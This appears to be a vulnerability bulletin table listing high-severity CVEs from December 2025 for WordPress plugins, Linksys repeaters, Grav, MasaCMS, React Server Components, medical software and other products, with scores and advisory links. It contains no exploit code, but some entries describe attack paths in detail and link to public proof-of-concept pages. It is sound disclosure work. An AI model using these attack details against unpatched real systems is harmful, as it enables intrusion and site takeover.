| Array Networks--ArrayOS AG | Array Networks ArrayOS AG before 9.4.5.9 allows command injection, as exploited in the wild in August through December 2025. | 2025-12-05 | 7.2 | CVE-2025-66644 | https://www.jpcert.or.jp/at/2025/at250024.html https://x.com/ArraySupport/status/1921373397533032590 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-arrayos-ag-vpn-flaw-to-plant-webshells/ |
| auth0--node-jws | auth0/node-jws is a JSON Web Signature implementation for Node.js. In versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an improper signature verification vulnerability when using the HS256 algorithm under specific conditions. Applications are affected when they use the jws.createVerify() function for HMAC algorithms and use user-provided data from the JSON Web Signature protected header or payload in HMAC secret lookup routines, which can allow attackers to bypass signature verification. This issue has been patched in versions 3.2.3 and 4.0.1. | 2025-12-04 | 7.5 | CVE-2025-65945 | https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e |
| Avast--Antivirus | Integer Overflow or Wraparound vulnerability in Avast Antivirus (25.1.981.6) on Windows allows Privilege Escalation. This issue affects Antivirus: from 25.1.981.6 before 25.3. | 2025-12-01 | 9 | CVE-2025-3500 | https://www.gendigital.com/us/en/contact-us/security-advisories/ |
| Avast--Antivirus | Heap-based Buffer Overflow, Out-of-bounds Read vulnerability in Avast Antivirus on MacOS when scanning a malformed file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Antivirus: from 8.3.70.94 before 8.3.70.98. | 2025-12-01 | 9 | CVE-2025-8351 | https://www.gendigital.com/us/en/contact-us/security-advisories/ |
| Avast--Antivirus | Heap-based Buffer Overflow, Out-of-bounds Write vulnerability in Avast Antivirus on MacOS via a crafted Mach-O file may allow Local Execution of Code or Denial of Service of antivirus protection. This issue affects Antivirus: from 15.7 before 3.9.2025. | 2025-12-01 | 8.1 | CVE-2025-10101 | https://www.gendigital.com/us/en/contact-us/security-advisories/ |
| Avast--Antivirus | NULL Pointer Dereference vulnerability in Avast Antivirus on MacOS and Avast Antivirus on Linux when scanning a malformed Windows PE file causes the antivirus process to crash. This issue affects Antivirus: 16.0.0; Antivirus: 3.0.3. | 2025-12-01 | 7.5 | CVE-2025-7007 | https://www.gendigital.com/us/en/contact-us/security-advisories/ |
| bacnet-stack--bacnet-stack | BACnet Protocol Stack library provides a BACnet application layer, network layer and media access (MAC) layer communications services. Prior to 1.5.0.rc2, the npdu_is_expected_reply function in src/bacnet/npdu.c indexes request_pdu[offset+2/3/5] and reply_pdu[offset+1/2/4] without verifying that those APDU bytes exist. bacnet_npdu_decode() can return offset == 2 for a 2-byte NPDU, so tiny PDUs pass the version check and are then read out of bounds. On ASan/MPU/strict builds this is an immediate crash (DoS). On unprotected builds it is undefined behavior and can mis-route replies; RCE is unlikely because only reads occur, but DoS is reliable. | 2025-12-05 | 7.5 | CVE-2025-66624 | https://github.com/bacnet-stack/bacnet-stack/security/advisories/GHSA-8wgw-5h6x-qgqg https://github.com/bacnet-stack/bacnet-stack/commit/9378f7d1e70169ebde4a5090bae7603703eadf48 |
| brainstormforce--Starter Templates AI-Powered Templates for Elementor & Gutenberg | The Starter Templates plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 4.4.41. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-06 | 8.8 | CVE-2025-13065 | https://www.wordfence.com/threat-intel/vulnerabilities/id/439e4c99-8f34-4e66-9d86-c0cbb8cf6da0?source=cve https://plugins.trac.wordpress.org/changeset/3395498/astra-sites/tags/4.4.42/inc/lib/starter-templates-importer/importer/wxr-importer/st-wxr-importer.php |
| brainstormforce--SureMail SMTP and Email Logs Plugin with Amazon SES, Postmark, and Other Providers | The SureMail - SMTP and Email Logs Plugin for WordPress is vulnerable to Unrestricted Upload of File with Dangerous Type in versions up to and including 1.9.0. This is due to the plugin's save_file() function in inc/emails/handler/uploads.php which duplicates all email attachments to a web-accessible directory (wp-content/uploads/suremails/attachments/) without validating file extensions or content types. Files are saved with predictable names derived from MD5 hashes of their content. While the plugin attempts to protect this directory with an Apache .htaccess file to disable PHP execution, this protection is ineffective on nginx, IIS, and Lighttpd servers, or on misconfigured Apache installations. This makes it possible for unauthenticated attackers to achieve Remote Code Execution by uploading malicious PHP files through any public form that emails attachments, calculating the predictable filename, and directly accessing the file to execute arbitrary code granted they are exploiting a site running on an affected web server configuration. | 2025-12-02 | 8.1 | CVE-2025-13516 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3a20047-a325-4d29-a848-7ffa525d0bad?source=cve https://plugins.trac.wordpress.org/browser/suremails/trunk/inc/emails/handler/uploads.php#L231 https://plugins.trac.wordpress.org/browser/suremails/trunk/inc/emails/handler/uploads.php#L113 https://plugins.trac.wordpress.org/browser/suremails/trunk/inc/admin/plugin.php#L407 https://cwe.mitre.org/data/definitions/434.html https://plugins.trac.wordpress.org/changeset/3403145/suremails/trunk?contextall=1&old=3389326&old_path=%2Fsuremails%2Ftrunk |
| Chanjet--CRM | A vulnerability was detected in Chanjet CRM up to 20251121. Affected is an unknown function of the file /tools/jxf_dump_table_demo.php. The manipulation of the argument gblOrgID results in SQL injection. The attack may be performed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.3 | CVE-2025-14189 | VDB-334609 \| Chanjet CRM jxf_dump_table_demo.php sql injection VDB-334609 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699133 \| chanjet CRM V1.0 SQL Injection https://github.com/hacker-routing/cve/issues/2 https://github.com/hacker-routing/cve/issues/2#issue-3646348225 |
| Chanjet--TPlus | A flaw has been found in Chanjet TPlus up to 20251121. Affected by this vulnerability is an unknown functionality of the file /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load. This manipulation of the argument currentAccId causes SQL injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.3 | CVE-2025-14190 | VDB-334610 \| Chanjet TPlus sql injection VDB-334610 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699144 \| Chanjet Chanjet T+ V1.0 SQL Injection https://github.com/hacker-routing/Changjetong-T-/issues/1 https://github.com/hacker-routing/Changjetong-T-/issues/1#issue-3646765351 |
| coder--coder | Coder allows organizations to provision remote development environments via Terraform. Prior to 2.26.5, 2.27.7, and 2.28.4, Workspace Agent manifests containing sensitive values were logged in plaintext unsanitized. An attacker with limited local access to the Coder Workspace (VM, K8s Pod etc.) or a third-party system (SIEM, logging stack) could access those logs. This vulnerability is fixed in 2.26.5, 2.27.7, and 2.28.4. | 2025-12-03 | 7.8 | CVE-2025-66411 | https://github.com/coder/coder/security/advisories/GHSA-jf75-p25m-pw74 https://github.com/coder/coder/commit/e2a46393fce40bc630df3293c1ee66a596277289 https://github.com/coder/coder/releases/tag/v2.26.5 https://github.com/coder/coder/releases/tag/v2.27.7 https://github.com/coder/coder/releases/tag/v2.28.4 |
| CODESYS--CODESYS Control RTE (SL) | An unauthenticated remote attacker may cause the visualisation server of the CODESYS Control runtime system to access a resource with a pointer of wrong type, potentially leading to a denial-of-service (DoS) condition. | 2025-12-01 | 7.5 | CVE-2025-41738 | https://certvde.com/de/advisories/VDE-2025-100 |
| CODESYS--CODESYS Development System | An unauthenticated attacker can trick a local user into executing arbitrary code by opening a deliberately manipulated CODESYS project file with a CODESYS development system. This arbitrary code is executed in the user context. | 2025-12-01 | 7.8 | CVE-2025-41700 | https://certvde.com/de/advisories/VDE-2025-101 |
| codisto--Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration Powered by Codisto | The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration - Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync() function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-04 | 7.2 | CVE-2025-11727 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4e3b796-af9a-4403-8d9a-1b56d7253b45?source=cve https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L2101 https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3063 https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3248 https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L2117 https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3249 |
| contentstudio--ContentStudio | The ContentStudio plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the cstu_update_post() function in all versions up to, and including, 1.3.7. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-05 | 8.8 | CVE-2025-12181 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5b92b0a4-7ebf-43b3-837b-ad710e5e35ff?source=cve https://wordpress.org/plugins/contentstudio/ |
| Dell--CloudBoost Virtual Appliance | Dell CloudBoost Virtual Appliance, versions 19.13.0.0 and prior, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2025-12-05 | 7 | CVE-2025-46603 | https://www.dell.com/support/kbdoc/en-us/000397417/dsa-2025-387-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities |
| DesignThemes--DesignThemes LMS | The DesignThemes LMS plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.4. This is due to the 'dtlms_register_user_front_end' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-12-02 | 9.8 | CVE-2025-13542 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c880470f-3f81-47a2-b450-7074410e9f43?source=cve https://themeforest.net/item/egrad-education-wordpress-theme/42803015 |
| dripadmin--CRM Memberships | The CRM Memberships plugin for WordPress is vulnerable to privilege escalation via password reset in all versions up to, and including, 2.5. This is due to missing authorization and authentication checks on the `ntzcrm_changepassword` AJAX action. This makes it possible for unauthenticated attackers to reset arbitrary user passwords and gain unauthorized access to user accounts via the `ntzcrm_changepassword` endpoint, granted they can obtain or enumerate a target user's email address. The plugin also exposes the `ntzcrm_get_users` endpoint without authentication, allowing attackers to enumerate subscriber email addresses, facilitating the exploitation of the password reset vulnerability. | 2025-12-05 | 9.8 | CVE-2025-13313 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e2837399-c44f-494e-bdc6-f9c6e4e2dc11?source=cve https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/ntzcrm-memberships.php#L42 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L12 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L63 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L795 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-dbquery.php#L287 |
| e4jvikwp--VikRentCar Car Rental Management System | The VikRentCar Car Rental Management System plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'month' parameter in all versions up to, and including, 1.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-02 | 7.5 | CVE-2025-13724 | https://www.wordfence.com/threat-intel/vulnerabilities/id/724a2da0-e4e7-4868-a1ad-fce69a915981?source=cve https://plugins.trac.wordpress.org/browser/vikrentcar/trunk/admin/views/overv/view.html.php#L195 https://plugins.trac.wordpress.org/browser/vikrentcar/tags/1.4.4/admin/views/overv/view.html.php#L195 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403439%40vikrentcar&new=3403439%40vikrentcar&sfp_email=&sfph_mail= |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to 15.86.0 and 14.99.2, a certain endpoint was vulnerable to error-based SQL injection due to lack of validation of parameters. Some information like version could be retrieved. This vulnerability is fixed in 15.86.0 and 14.99.2. | 2025-12-01 | 7.1 | CVE-2025-66205 | https://github.com/frappe/frappe/security/advisories/GHSA-mp93-8vxr-hqq9 https://github.com/frappe/frappe/commit/984c641bff9539b6126a01146096f133db6a955b |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, when a user with privilege of user creation creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 8.8 | CVE-2025-66295 | https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a privilege escalation vulnerability exists in Grav's Admin plugin due to the absence of username uniqueness validation when creating users. A user with the create user permission can create a new account using the same username as an existing administrator account, set a new password/email, and then log in as that administrator. This effectively allows privilege escalation from limited user-manager permissions to full administrator access. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 8.8 | CVE-2025-66296 | https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, Grav CMS is vulnerable to a Server-Side Template Injection (SSTI) that allows any authenticated user with editor permissions to execute arbitrary code on the remote server, bypassing the existing security sandbox. Since the security sandbox does not fully protect the Twig object, it is possible to interact with it (e.g., call methods, read/write attributes) through maliciously crafted Twig template directives injected into a web page. This allows an authenticated editor to add arbitrary functions to the Twig attribute system.twig.safe_filters, effectively bypassing the Grav CMS sandbox. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 8.8 | CVE-2025-66299 | https://github.com/getgrav/grav/security/advisories/GHSA-gjc5-8cfh-653x https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a low-privilege user account with page editing privilege can read any server files using the "Frontmatter" form. This includes Grav user account files (/grav/user/accounts/*.yaml), which store the hashed user password, 2FA secret, and the password reset token. This can allow an adversary to compromise any registered account by resetting a password for a user to obtain the password reset token from the file, or by cracking the hashed password. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 8.5 | CVE-2025-66300 | https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2 https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4 prior to 18.4.5, 18.5 prior to 18.5.3, and 18.6 prior to 18.6.1 that could have allowed an authenticated user to obtain credentials from higher-privileged users and perform actions in their context under specific conditions. | 2025-12-05 | 7.7 | CVE-2024-9183 | GitLab Issue #494478 HackerOne Bug Bounty Report #2707421 |
| H3C--Magic B0 | A weakness has been identified in H3C Magic B0 up to 100R002. This impacts the function EditWlanMacList of the file /goform/aspForm. This manipulation of the argument param causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 8.8 | CVE-2025-14015 | VDB-334256; H3C Magic B0 aspForm EditWlanMacList buffer overflow VDB-334256; CTI Indicators (IOB, IOC, IOA) Submit #694755; New H3C Technologies Co., Ltd. Magic Bo Magic B0<=100R002 Buffer Overflow https://github.com/HungryGoogle/log_attack/blob/main/index2/2.md |
| H3C--Magic B1 | A weakness has been identified in H3C Magic B1 up to 100R004. The affected element is the function sub_44de0 of the file /goform/aspForm. This manipulation of the argument param causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 8.8 | CVE-2025-14196 | VDB-334616; H3C Magic B1 aspForm sub_44de0 buffer overflow VDB-334616; CTI Indicators (IOB, IOC, IOA) Submit #699387; H3C Magic B1 ≤100R004 Buffer Overflow https://github.com/lin-3-start/lin-cve/blob/main/H3C%20Magic%20B1/H3C%20Magic%20B1.md https://github.com/lin-3-start/lin-cve/blob/main/H3C%20Magic%20B1/H3C%20Magic%20B1.md#poc |
| hwk-fr--Advanced Custom Fields: Extended | The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Remote Code Execution in versions 0.9.0.5 through 0.9.1.1 via the prepare_form() function. This is due to the function accepting user input and then passing that through call_user_func_array(). This makes it possible for unauthenticated attackers to execute arbitrary code on the server, which can be leveraged to inject backdoors or create new administrative user accounts. | 2025-12-03 | 9.8 | CVE-2025-13486 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c508cb73-53e6-4ebe-b3d0-285908b722c9?source=cve https://plugins.trac.wordpress.org/changeset/3400134/acf-extended |
| IBM--Informix Dynamic Server | IBM Informix Dynamic Server 14.10 could allow a local user on the system to log into the Informix server as administrator without a password. | 2025-12-02 | 8.4 | CVE-2024-45675 | https://www.ibm.com/support/pages/node/7252704 |
| kapilduraphe--mcp-watch | MCP Watch is a comprehensive security scanner for Model Context Protocol (MCP) servers. In 0.1.2 and earlier, the MCPScanner class contains a critical Command Injection vulnerability in the cloneRepo method. The application passes the user-supplied githubUrl argument directly to a system shell via execSync without sanitization. This allows an attacker to execute arbitrary commands on the host machine by appending shell metacharacters to the URL. | 2025-12-01 | 9.8 | CVE-2025-66401 | https://github.com/kapilduraphe/mcp-watch/security/advisories/GHSA-27m7-ffhq-jqrm https://github.com/kapilduraphe/mcp-watch/commit/e7da78c5b4b960f8b66c254059ad9ebc544a91a6 |
| kraftplugins--Demo Importer Plus | The Demo Importer Plus plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.0.6. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-05 | 8.8 | CVE-2025-13066 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7df0ea8a-5e2c-4f5e-a326-b92df37ffa3c?source=cve https://plugins.trac.wordpress.org/changeset/3400301/demo-importer-plus/trunk/inc/importers |
| Linksys--RE6500 | A vulnerability was found in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this vulnerability is the function AP_get_wireless_clientlist_setClientsName of the file mod_form.so. Performing manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14133 | VDB-334522; Linksys RE6500/RE6250/RE6300/RE6350/RE7000/RE9000 mod_form.so AP_get_wireless_clientlist_setClientsName stack-based overflow VDB-334522; CTI Indicators (IOB, IOC, IOA) Submit #697980; Linksys RE6500、RE6250、RE6300、RE6350、RE7000、RE9000 RE6500(1.0.013.001) RE6250(1.0.04.001) RE6300(1.2.07.001) RE6350(1.0.04.001) RE7000(1.1.05.003) RE9000(1.0.04.002) Stack-based Buffer Overflow https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_62/62.md https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_62/62.md#poc https://www.linksys.com/ |
| Linksys--RE6500 | A vulnerability was determined in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this issue is the function RE2000v2Repeater_get_wireless_clientlist_setClientsName of the file mod_form.so. Executing manipulation of the argument clientsname_0 can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14134 | VDB-334523; Linksys RE6500/RE6250/RE6300/RE6350/RE7000/RE9000 mod_form.so stack-based overflow VDB-334523; CTI Indicators (IOB, IOC, IOA) Submit #697981; Linksys RE6500、RE6250、RE6300、RE6350、RE7000、RE9000 RE6500(1.0.013.001) RE6250(1.0.04.001) RE6300(1.2.07.001) RE6350(1.0.04.001) RE7000(1.1.05.003) RE9000(1.0.04.002) Stack-based Buffer Overflow https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_63/63.md https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_63/63.md#poc https://www.linksys.com/ |
| Linksys--RE6500 | A vulnerability was identified in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This affects the function AP_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14135 | VDB-334524; Linksys RE6500/RE6250/RE6300/RE6350/RE7000/RE9000 mod_form.so AP_get_wired_clientlist_setClientsName stack-based overflow VDB-334524; CTI Indicators (IOB, IOC, IOA) Submit #697982; Linksys RE6500、RE6250、RE6300、RE6350、RE7000、RE9000 RE6500(1.0.013.001) RE6250(1.0.04.001) RE6300(1.2.07.001) RE6350(1.0.04.001) RE7000(1.1.05.003) RE9000(1.0.04.002) Stack-based Buffer Overflow https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_64/64.md https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_64/64.md#poc https://www.linksys.com/ |
| Linksys--RE6500 | A security flaw has been discovered in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This vulnerability affects the function RE2000v2Repeater_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14136 | VDB-334525; Linksys RE6500/RE6250/RE6300/RE6350/RE7000/RE9000 mod_form.so stack-based overflow VDB-334525; CTI Indicators (IOB, IOC, IOA) Submit #697983; Linksys RE6500、RE6250、RE6300、RE6350、RE7000、RE9000 RE6500(1.0.013.001) RE6250(1.0.04.001) RE6300(1.2.07.001) RE6350(1.0.04.001) RE7000(1.1.05.003) RE9000(1.0.04.002) Stack-based Buffer Overflow https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_65/65.md https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_65/65.md#poc https://www.linksys.com/ |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.4 due to incorrect implementation of the authentication algorithm in the "wdk_generate_auto_login_link" function. This is due to the feature using a cryptographically weak token generation mechanism. This makes it possible for unauthenticated attackers to gain administrative access and achieve full site takeover via the auto-login endpoint with a predictable token. | 2025-12-03 | 10 | CVE-2025-13390 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6598d171-e68c-4d2f-9cd1-f1574fa90433?source=cve https://plugins.trac.wordpress.org/changeset/3400599/wpdirectorykit/ https://github.com/d0n601/CVE-2025-13390 https://ryankozak.com/posts/cve-2025-13390/ |
| MasaCMS--MasaCMS | Masa CMS is an open source Enterprise Content Management platform. Masa CMS versions prior to 7.2.8, 7.3.13, and 7.4.6 are vulnerable to remote code execution. The vulnerability exists in the addParam function, which accepts user input via the criteria parameter. This input is subsequently evaluated by setDynamicContent, allowing an unauthenticated attacker to execute arbitrary code via the m tag. The vulnerability is patched in versions 7.2.8, 7.3.13, and 7.4.6. | 2025-12-03 | 9.8 | CVE-2024-32641 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-cj9g-v5mq-qrjm https://github.com/MasaCMS/MasaCMS/commit/fb27f822fe426496af71205fa35208e58823fcf6 |
| MasaCMS--MasaCMS | Masa CMS is an open source Enterprise Content Management platform. Prior to 7.2.8, 7.3.13, and 7.4.6, the CMS is vulnerable to host header poisoning, which allows account takeover via the password reset email. This vulnerability is fixed in 7.2.8, 7.3.13, and 7.4.6. | 2025-12-03 | 8.8 | CVE-2024-32642 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-qjm6-c8hx-ffh8 https://github.com/MasaCMS/MasaCMS/commit/7541b9c99fb9e32d1de6f2658750525cec1d8960 |
| MasaCMS--MasaCMS | Masa CMS is an open source Enterprise Content Management platform. Prior to 7.2.8, 7.3.13, and 7.4.6, if the URL to the page is modified to include a /tag/ declaration, the CMS will render the page regardless of group restrictions. This vulnerability is fixed in 7.2.8, 7.3.13, and 7.4.6. | 2025-12-03 | 7.5 | CVE-2024-32643 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-f469-jh82-97fv https://github.com/MasaCMS/MasaCMS/commit/d1a2e57ef8dbc50c87b178eacc85fcccb05f5b6c |
| MAXHUB--Pivot client application | The password reset mechanism for the Pivot client application is weak, and it may allow an attacker to take over the account. | 2025-12-04 | 7.5 | CVE-2025-53704 | https://www.maxhub.com/en/support/ https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-02 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-02.json |
| Medtronic--CareLink Network | Medtronic CareLink Network allows an unauthenticated remote attacker to perform a brute force attack on an API endpoint that could be used to determine a valid password under certain circumstances. This issue affects CareLink Network: before December 4, 2025. | 2025-12-04 | 8.1 | CVE-2025-12995 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html |
| Meta--react-server-dom-webpack | A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints. | 2025-12-03 | 10 | CVE-2025-55182 | https://www.facebook.com/security/advisories/cve-2025-55182 https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose V22.02 and previous versions rely on a common SQL Server user account to access data in the database. User access in the client application is restricted by a password authentication check in the client software but the underlying database connection always has access. The latest version of NMIS/BioDose introduces an option to use Windows user authentication with the database, which would restrict this database connection. | 2025-12-02 | 8.3 | CVE-2025-61940 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose V22.02 and previous versions rely on a Microsoft SQL Server database. The SQL user account 'nmdbuser' and other created accounts by default have the sysadmin role. This can lead to remote code execution through the use of certain built-in stored procedures. | 2025-12-02 | 8.3 | CVE-2025-62575 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose V22.02 and previous version installations where the embedded Microsoft SQLServer Express is used are exposed in the Windows share accessed by clients in networked installs. By default, this directory has insecure directory paths that allow access to the SQL Server database and configuration files, which can contain sensitive data. | 2025-12-02 | 8.4 | CVE-2025-64298 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose V22.02 and previous versions' installation directory paths by default have insecure file permissions, which in certain deployment scenarios can enable users on client workstations to modify the program executables and libraries. | 2025-12-02 | 8 | CVE-2025-64642 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| Mirion Medical--EC2 Software NMIS BioDose | NMIS/BioDose software V22.02 and previous versions contain executable binaries with plain text hard-coded passwords. These hard-coded passwords could allow unauthorized access to both the application and database. | 2025-12-02 | 7.3 | CVE-2025-64778 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01 |
| moderntribe--Auto Thumbnailer | The Auto Thumbnailer plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadThumb() function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-05 | 8.8 | CVE-2025-12154 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d7c98191-bf17-4e94-88cc-ad385b1fe97d?source=cve https://wordpress.org/plugins/auto-thumbnailer/ |
